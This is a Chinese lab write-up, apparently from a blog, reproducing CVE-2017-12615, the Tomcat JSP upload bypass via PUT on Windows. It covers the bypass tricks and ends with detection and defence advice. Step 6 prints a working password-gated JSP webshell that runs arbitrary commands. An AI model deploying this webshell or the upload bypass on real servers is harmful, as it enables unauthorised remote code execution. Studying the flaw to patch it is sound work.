2. 程式人生 > >CVE2017-12615漏洞復現( tomcat JSP Upload Bypass /Remote Code Execution)

CVE2017-12615漏洞復現( tomcat JSP Upload Bypass /Remote Code Execution)

阿新 發佈:2019-05-17

CVE2017-12615漏洞復現( tomcat JSP Upload Bypass /Remote Code Execution)

一、漏洞原理

在windows伺服器下,將readonly引數設定為false時,即可通過PUT方式建立一個jsp檔案,並可以執行任意程式碼。Tomcat版本內web.xml配置內無readonly,需要手工新增,預設配置不受此影響。

二、影響版本

Apache Tomcat 7.0.0-7.0.79(Windows環境下)

三、漏洞利用條件

  1. 目標是windows環境
  2. 目標tomcat的版本7.0.0-7.0.79
  3. 管理員配置不當,設定了readonly,並且其值為false
  4. 上傳目標的地方具有寫入許可權

四、環境搭建

Java環境(jdk 1.7)

Tomcat環境(tomcat 7.0.70)

五、漏洞復現

1.測試tomcat環境

   

2.修改web.xml,tomcat版本內web.xml預設沒有readonly,首要手工新增,將readonly引數設定為false時,然後就能通過PUT方式建立一個jsp檔案,並可以執行任意程式碼。

  

3.搜尋漏洞庫,根據poc說明驗證漏洞的存在

  

4.啟動tomcat,burp抓包,利用PUT請求建立檔案,上傳內容後,發現上傳失敗,提示404

  

5.根據漏洞描述中windows環境受影響,可以嘗試利用windows的特性(檔名不能以空格結尾,NTFS檔案流)來繞過限制

5.1利用檔名不能為空格,在檔名後加空格上傳檔案,上傳失敗,提示403

  

5.2提示403,一般可能是因為上傳的目標資料夾沒有寫入許可權。檢視許可權發現目標沒有寫入許可權。

  

5.3給目標資料夾加入寫入許可權,然後測試

  

5.4瀏覽器訪問上傳的檔案

  

5.5嘗試NTFS檔案流,成功上傳

  

5.6瀏覽器測試

  

5.7構造特殊字尾名繞過tomcat檢測

  

6.通過以上poc可以證明目標存在檔案上傳漏洞,上傳jsp一句話木馬

<%

if("023".equals(request.getParameter("pwd"))){

java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();

int a = -1;

byte[] b = new byte[2048];

out.print("<pre>");

while((a=in.read(b))!=-1){

out.println(new String(b));

}

out.print("</pre>");

}

%>

  

7.瀏覽器訪問構造引數,下圖可以說明目標存在遠端程式碼執行漏洞

  

六、漏洞分析總結

  1. 通過以上分析可以得出,這個漏洞的利用的前提條件很多,需要目標是windows環境,需要管理員錯誤配置開啟readonly並且設定其值為false等等,漏洞危害性一般。

七、檢測與防禦

檢測:檢視是否開啟readonly以及是否啟用了PUT方法。

防禦:

  1. 禁用PUT方法
  2. 設定readonly值為True
  3. 升級到最新版本

    4. 相關推薦

    CVE2017-12615漏洞復現( tomcat JSP Upload Bypass /Remote Code Execution)

    CVE2017-12615漏洞復現( tomcat JSP Upload Bypass /Remote Code Execution) 一、漏洞原理 在windows伺服器下,將readonly引數設定為false時,即可通過PUT方式建立一個jsp檔案,並可以執行任意程式碼。Tomcat版本內web.x

    Tomcat CVE-2017-12615 遠程上傳漏洞復現

    pan 技術分享 port style 運行 下載鏈接 imp put tom 漏洞名稱:CVE-2017-12615-遠程代碼執行漏洞 CVE-2017-12615:遠程代碼執行漏洞 當 Tomcat運行在Windows操作系統時,且啟用了HTTP PUT請求方法(例

    Tomcat後臺弱口令上傳war包漏洞復現

    近期在專案中碰到的ApacheTomcat中介軟體愈來愈多,於是乎。想著做一個整理。將ApacheTomcat中介軟體的幾大較為重要的高危漏洞做一個總結整理復現。用作來鞏固更新自己的知識庫。 首先我們先來了解以下Tomcat的概念: Tomcat是我們在工作中所使用的一款開源輕量級的Web應

    Apache Tomcat Ajp-CVE-2020-1938漏洞復現

    環境搭建: sudo docker pull duonghuuphuc/tomcat-8.5.32 sudo docker run -d -it -p 8080:8080 -p 8009:8009   --name ghostcat duonghuuphuc/tomcat-8.5.32

    (總結)CentOS 6.x使用yum快速安裝Apache+PHP+Tomcat(JSP)+MySQL

    apache 意思 安裝apache /var/ 軟件 cat yum proxy_ajp alt (總結)CentOS 6.x使用yum快速安裝Apache+PHP+Tomcat(JSP)+MySQL PS:這個是懶人yum快速安裝法,用於開發和測試環境很方便,用於沒有特

    LNK文件(快捷方式)遠程代碼執行漏洞復現過程(CVE-2017-8464)

    abi cred starting compute appear pda info 等級 server 漏洞編號:CVE-2017-8464 漏洞等級:嚴重 漏洞概要:如果用戶打開攻擊者精心構造的惡意LNK文件,則會造成遠程代碼執行。成功利用此漏洞的攻擊者可以獲得與本地

    漏洞預警】CVE-2017-8464 震網三代漏洞復現(兩種利用方法)

    art cal mage http test ip地址 get for oot 早在6月13日,微軟發布補丁修復編號為CVE-2017-8464的漏洞,本地用戶或遠程攻擊者可以利用該漏洞生成特制的快捷方式,並通過可移動設備或者遠程共享的方式導致遠程代碼執行,追溯到以前,NS

    Office CVE-2017-8570遠程代碼執行漏洞復現

    pytho pack root 一個 strong -o 激活 meta 相同 實驗環境 操作機:Kali Linux IP:172.16.11.2 目標機:windows7 x64 IP:172.16.12.2 實驗目的 掌握漏洞的利用方法 實驗

    Discuz!X 3.4 任意文件刪除漏洞復現過程(附python腳本)

    文件刪除 def aaa dal -1 headers bug send auth   今天看下群裏在討論Discuz!X 3.4 任意文件刪除漏洞,自己做了一些測試,記錄一下過程。結尾附上自己編寫的python腳本,自動化實現任意文件刪除。 具體漏洞,請查看 https:

    ADV170014 NTLM SSO 漏洞復現

    ntc 機制 run machine 虛擬 關閉 server ref his 2017年10月,微軟周二補丁日發布的補丁中有一個可選的安全補丁:ADV170014,這個補丁修復了NTLM認證機制的一個bug,惡意攻擊者可以利用這個bug竊取用戶密碼hash並可以遠程利用該

    Struts2-052 漏洞復現

    hal pty sha sta bject 程序 html message command s2-052漏洞復現 參考鏈接: http://www.freebuf.com/vuls/147017.html http://www.freebuf.com/vuls/1467

    漏洞復現:Struts2 遠程代碼執行漏洞(S2-033)

    res 3par alt param amp lan post pull struts docker pull medicean/vulapps:s_struts2_s2-033 docker run -d -p 80:8080 medicean/vulapps:s_str

    [漏洞復現] CVE-2017-11882 通殺所有office版本

    CVE-2017-11882 office漏洞 黑客 Kali Linux 滲透測試 1、漏洞概述這幾個月來,針對微軟Office套件最火熱最流行的攻擊手段,莫過於基於CVE-2017-11882的漏洞利用。2017年11月14號,微軟推送了常規的安全更新,其中,關於CVE-2017-11

    [漏洞復現] MS17-010 基於"永恒之藍"實現Windows Getshell

    永恒之藍 黑客 滲透測試 MS17-010 Kali Linux 1、漏洞概述2017年5月,被稱為近10年來影響範圍最廣泛“最囂張”的WannaCry勒索病毒席卷全球,據統計,全球共有150多個國家超30萬臺終端被感染,波及政府、學校、醫院、金融、航班等各行各業。一旦中了WannaCry

    Office CVE-2017-8570 遠程代碼執行漏洞復現

    CVE-2017-8570 Office 遠程代碼執行 最近在學習kali的相關使用,朋友說不如就復現cve-2017-8570吧,我欣然答應。 0x00介紹CVE-2017-8570是一個邏輯漏洞,成因是Microsoft PowerPoint執行時會初始化“script”Moniker對象,

    [漏洞復現] CVE-2018-4878 Flash 0day

    黑客 滲透測試 Kali Linux 漏洞復現 Adobe Flash 1、漏洞概述2018年2月1號,Adobe官方發布安全通報(APSA18-01),聲明Adobe Flash 28.0.0.137及其之前的版本,存在高危漏洞(CVE-2018-4878)。攻擊者通過構造特殊的Flas

    [漏洞復現] CVE-2017-16995 Ubuntu16.04漏洞復現

    黑客 漏洞復現 Kali Linux 滲透測試 Ubuntu 1、漏洞概述Ubuntu最新版本16.04存在本地提權漏洞,該漏洞存在於Linux內核帶有的eBPF bpf(2)系統調用中,當用戶提供惡意BPF程序使eBPF驗證器模塊產生計算錯誤,導致任意內存讀寫問題。 攻擊者(普通用戶)可

    structs2的048漏洞復現 2.3.32版本

    重啟 clas arch ext pps index 找到 spa pan S2-048 遠程代碼執行漏洞 影響版本: 2.0.0 - 2.3.32 之前在網上說只要時2.3.*的版本都有這個漏洞,自己裝了個2.3.34的試了幾次都沒有執行 然後下載了找到了

    關於weblogic 10.3.6.0 的漏洞復現(1)

    iter oid sch AD 成功 str context blog env 最近小R 搭建了個weblogic, 因為之前在公司找系統漏洞的時候,發現了這個漏洞,所以為了特地專門搭建了個10.3.6.0版本。 漏洞編號: CVE-2017-10271 漏洞的描述:就是

    Adobe Flash cve-2018-4878 的漏洞復現

    metasploit cve-2018-4878 msfconsole 0day 漏洞概述2018年2月1日, Adobe官方發布了Adobe Flash Player系列產品的安全通告(APSA18-01),該0day漏洞編號為CVE-2018-4878,目前最新版本28.0.0.137及其